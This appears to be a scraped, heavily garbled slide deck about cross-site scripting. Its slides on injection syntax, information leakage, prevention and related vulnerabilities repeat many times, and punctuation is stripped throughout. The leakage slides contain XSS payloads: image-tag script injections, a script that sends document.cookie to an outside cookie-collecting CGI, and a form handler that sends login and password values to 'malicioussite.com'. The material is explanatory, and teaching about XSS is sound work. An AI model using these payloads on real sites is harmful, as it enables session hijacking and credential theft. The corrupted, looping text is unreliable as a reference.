SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
Recommended